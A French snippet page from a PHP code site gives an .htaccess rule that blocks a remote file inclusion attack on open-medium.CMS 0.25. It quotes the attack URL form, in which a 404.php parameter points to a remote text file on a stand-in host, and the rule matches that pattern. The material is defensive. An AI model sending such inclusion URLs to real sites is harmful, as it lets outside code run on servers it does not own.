Protection contre le hack avec 404.php

  Information

Le script se trouve peut-être sur votre site géré par open-medium.CMS en version 0.25.

La faille touche les sites dont le paramètre register_globals est à on.

Une petite règle dans le fichier .htaccess permet de renvoyer un code retour 403. Les url concernées sont de la forme : http://www.example.com/404.php?REDSYS[MYPATH][TEMPLATES]=http://sitepourri.com/page.txt?

  code source classé dans  .HTACCESS ANTI HACK

 
 01    
 02    
 03    
 04    
 05    
 06    
 07    
 08    
 09    
 10    
 11    
 12    
 13    
 14    
 15    
 16    
                               
/*
Titre : Protection contre le hack avec 404.php

URL : https://phpsources.net/code_s.php?id=780
Auteur : Forty
Website auteur : http://www.toplien.fr/
Date édition : 09 Juin 2008
Date mise a jour : 18 Aout 2019

Rapport de la maj:
- fonctionnement du code vérifié
*/
/*---------------------------------------------------------------*/?>
RewriteCond %{QUERY_STRING} ^(.*&)?REDSYS\[MYPATH\]\[TEMPLATES\]=http://
RewriteRule ^(.+/)?404\.php$ - [F,L]

   Un petit merci aux éditeurs pour leur travail ne coûte rien et ça leur fait toujours plaisir wink

 Autres snippets qui pourraient vous intéressez

Connexion + sécurité contre le vol de cookies + bruteforce

Compatibilité : PHP 5, PHP 7, PHP 8

Le but de cette classe est de protéger vos utilisateurs du vol de cookie online, en introduisant leur IP publique dans le hash du cookie.

Astuce trés simple contre le spam - PHP Sources

Compatibilité : PHP 5, PHP 7, PHP 8

On sait que les robots pollue le web avec le spam en alimentant de manière automatique les formulaires de contacts par exemple.

Regex Anti hack JavaScript

Compatibilité : PHP 5, PHP 7, PHP 8

Vous en avez marre de voir vos formulaires rempli de Javascript - Ce code va empêcher plusieurs formes de hack JS.

Bloquer dynamiquement des IP hack et stocker ces IP dans des fichiers - PHP Sources

Compatibilité : PHP 5, PHP 7, PHP 8

Il faut installer un script zippé au préalable puis remplacer la fonction controle_ip() par celle que nous vous donnons.

Tag cloud PHP avec démo en ligne

Compatibilité : PHP 5, PHP 7, PHP 8

Tag Cloud Mysqli - Actualisé pour passer sur tous les sites web. Démo en ligne disponible. Explication du code. Support.

* Requêtes exécutées avec Recherche Contextuelle

  Derniers scripts PHP / MySQL

Magix-CMS 3.7.9

logo Magix-CMS
Langue langue fr
Date  aujourd'hui
Taille 19 Mo
Catégorie CMS

ILIAS 10.5

Script PHP / MySQL
Langue langue de
Date  hier
Taille 149 Mo
Catégorie Administration

CubeCart 6.5.12

Script PHP / MySQL
Langue langue en
Date  hier
Taille 16 Mo
Catégorie Ecommerce

Drupal 11.2

logo Drupal
Langue langue us
Date 22 Fév 2026
Taille 177 Mo
Catégorie CMS

SEO Panel 5.1.0

Script PHP / MySQL
Langue langue fr
Date 20 Fév 2026
Taille 28 Mo
Catégorie Divers

Ampache 7.9.0

Script PHP / MySQL
Langue langue us
Date 20 Fév 2026
Taille 11 Mo
Catégorie Divers
avatar

Forty

  09 Juin 2008

  SOURCE   Télécharger

Information sur les mises à jour

Dernière mise à jour :

    18 Aout 2019
    fonctionnement du code vérifié

8 442 Vues
Compatibilité du code
PHP 5, PHP 7, PHP 8
avatar